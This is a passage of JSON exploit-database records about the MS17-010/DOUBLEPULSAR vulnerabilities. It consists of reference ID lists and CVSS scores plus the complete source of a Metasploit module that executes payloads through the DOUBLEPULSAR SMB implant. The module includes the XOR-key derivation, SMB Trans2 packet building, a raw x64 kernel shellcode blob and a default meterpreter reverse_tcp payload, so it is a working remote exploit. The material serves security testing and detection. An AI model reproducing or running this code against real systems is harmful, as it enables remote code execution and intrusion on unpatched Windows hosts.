"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-23T22:16:05", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-23T22:16:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-24] #"}, "lastseen": "2021-09-23T22:16:05", "differentElements": ["sourceData"], "edition": 24}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "437f74e38249c68c6f9f777dc61e9974", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-25T00:21:39", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96703", "SMNTC-96709"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": 